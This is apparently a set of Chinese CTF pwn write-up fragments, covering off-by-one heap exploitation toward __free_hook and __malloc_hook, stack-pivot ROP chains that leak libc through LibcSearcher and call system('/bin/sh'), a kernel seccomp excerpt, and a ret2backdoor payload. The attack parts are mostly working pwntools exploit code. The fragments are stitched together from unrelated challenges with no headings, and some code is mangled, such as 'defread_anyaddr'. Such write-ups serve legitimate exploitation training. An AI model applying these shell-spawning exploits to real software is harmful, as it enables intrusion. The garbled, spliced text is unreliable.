经过调试验证,证实上面的思路是正确的。我们成功通过off by one漏洞获取到一个chunk_info的读写权限。
那么,后面的思路也就清晰了:将后面一个chunk_info的可读写空间调大,获取到#4中的main_arena地址,进而计算libc基地址。然后直接将#3的可写地址改为__free_hook地址,写入one_gadget,再调用free函数即可getshell。
也是一道考察off by one漏洞的题目。
经过分析,本题使用的数据结构如下:一共可以创建至多16个这样的结构。
在write_note实现函数中,当输入的size值是原来定义值-10时会触发一个off by one漏洞,能够溢出一个字节。
可见本题的思路和上一题类似,但由于本题的堆环境不同,需要对利用姿势加以修改。
如上图所示,我们通过off by one漏洞将下一个chunk的size改大,使其能够正好覆盖下一个chunk。由于可读写的空间大小保存在bss段,因此此时我们可读写的空间大小实际上并没有改变。然后将这个改大的chunk释放,这样就会产生一个和下一个chunk完全重合的free chunk,在内部保存有main_arena的地址。通过读取下一个chunk即可获取。
获取到__malloc_hook的地址之后,我们可以通过上图的方式进行fastbin attack。同样是堆块重叠,但这次是将整个unsorted bin chunk都重新申请回来,通过中间的chunk #4修改chunk #5的fd指针到__malloc_hook,这样可以在接下来申请到__malloc_hook处的chunk。
# construct fake stack payload = p32(elf.symbols['m1'] + 20) payload += p32(elf.plt['write']) payload += p32(elf.symbols['vul_function']) # return address, return to function payload += p32(1) # first argument of write: stdout payload += p32(elf.got['write']) # second argument of write: .got address of 'write' payload += p32(4) # third argument of write: write length
io.sendlineafter(b'What is your name?', payload)
payload = cyclic(0x18) payload += p32(elf.symbols['s']) # fake ebp payload += p32(0x8048511) # return to 'leave; retn' to change rsp into .bss segment
io.sendafter(b'What do you want to say?', payload)
write = u32(io.recv(4)) print(hex(write)) libc = LibcSearcher('write', write) base = write - libc.dump('write') sys = base + libc.dump('system') binsh = base + libc.dump('str_bin_sh')
# we can change the stack after ebp directly through 'vul_function' # now the ebp points to s+8, so fill 12 bytes of garbage into s first payload = p32(0xdeadbeef) * 3 payload += p32(sys) payload += p32(0xdeadbeef) payload += p32(binsh)
io.sendlineafter(b'What is your name?', payload) io.sendlineafter(b'What do you want to say?', b'Hacked')
io.sendlineafter(b'Pull up your sword and tell me u story!\n', payload) puts = u64(io.recv(6) + b'\x00\x00') libc = LibcSearcher('puts', puts) base = puts - libc.dump('puts') sys = base + libc.dump('system') binsh = base + libc.dump('str_bin_sh')
switch (seccomp_mode) { case SECCOMP_MODE_STRICT: op = SECCOMP_SET_MODE_STRICT; /* * Setting strict mode through prctl always ignored filter, * so make sure it is always NULL here to pass the internal * check in do_seccomp(). */ uargs = NULL; break; case SECCOMP_MODE_FILTER: op = SECCOMP_SET_MODE_FILTER; uargs = filter; break; default: return -EINVAL; }
/* prctl interface doesn't have flags, so they are always zero. */ return do_seccomp(op, 0, uargs); }
其中switch的宏定义如下:
1 2 3
#define SECCOMP_MODE_DISABLED 0 /* seccomp is not in use. */ #define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */ #define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */
# repeat 3 times of function vul to reach address of __libc_start_main + 241 io.sendafter(b'Welcome, my friend. What\'s your name?\n', cyclic(0x30)) io.sendafter(b'Hello', cyclic(0x2c) + p32(elf.symbols['vul'])) io.recvuntil(b'Hello')
payload = cyclic(0x10) payload += p64(write) # We use write twice to make rsp go up to reach the '__libc_start_main' payload += p64(write) payload += p64(read_write)
defread_anyaddr(addr): io.sendlineafter(b'want me to read? ', b'-1') io.sendlineafter(b'bytes of data!', cyclic(0x2C + 4) + p32(elf.plt['printf']) + p32(elf.symbols['vuln']) + p32(addr)) content = io.recvuntil(b'How', drop=True) returnlen(content)
io.sendlineafter(b'How many bytes do you want me to read? ', b'-1') io.sendlineafter(b'bytes of data!', cyclic(0x2C + 4) + p32(elf.plt['printf']) + p32(elf.symbols['vuln']) + p32(elf.got['printf'])) io.recvuntil(p32(elf.got['printf']) + b'\n')
# io.recv(4) printf = u32(io.recv(4))
libc = LibcSearcher('printf', printf) print(hex(printf)) base = printf - libc.dump('printf') sys = base + libc.dump('system') binsh = base + libc.dump('str_bin_sh')
io.sendlineafter(b'length of your name:', b'1000') io.sendlineafter(b'What\'s u name?', cyclic(0x10 + 8) + p64(elf.symbols['backdoor'])) io.interactive()